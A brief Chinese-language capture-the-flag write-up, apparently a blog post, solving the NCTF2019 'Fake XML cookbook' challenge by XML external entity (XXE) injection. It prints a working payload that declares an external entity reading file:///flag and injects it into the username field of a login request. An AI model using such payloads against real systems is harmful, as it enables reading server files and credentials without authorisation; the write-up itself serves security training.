[NCTF2019]Fake XML cookbook1

worker..2024-08-05 0:01

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
前网易架构师-高司机9 天前
带标注的驾驶员安全带识别数据集,识别率99.5%,可识别有无系安全带,支持yolo,coco json,pascal voc xml格式
xml·yolo·数据集·交通·安全带
逍遥德9 天前
Maven教程.01- settings.xml 文件<profile>使用详解
xml·java·maven
逍遥德9 天前
Maven教程.03-如何阅读pom.xml文件
xml·java·后端·maven
松叶似针10 天前
Flutter三方库适配OpenHarmony【doc_text】— .docx 解析全流程:从 ZIP 解压到 XML 提取
xml·flutter·harmonyos
松叶似针10 天前
Flutter三方库适配OpenHarmony【doc_text】— parseDocxXml:正则驱动的 XML 文本提取
xml·flutter
2301_7806698611 天前
MyBatis(配置,增删改查,注解与XML两种开发方式)、SpringBoot配置文件(yml简化properties)
xml·spring boot·mybatis·javaweb
强子感冒了13 天前
JSON和XML学习笔记
xml·学习·json
сокол16 天前
【网安-Web渗透测试-漏洞系列】XXE漏洞
xml·web安全·php
树码小子18 天前
Mybatis(13)MyBatis Generator(xml生成器)& Mybatis-Plus初识
xml·mybatis
MX_935922 天前
Spring xml 方式整合第三方框架总结加案例
xml·java·spring
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04本地部署 OpenClaw + DeepSeek-R1 完全指南05Window 10部署openclaw报错node.exe : npm error code 12806OpenClaw优化飞书API 额度已耗尽问题07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录09小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)10OpenClaw 飞书机器人不回复消息?3 小时踩坑总结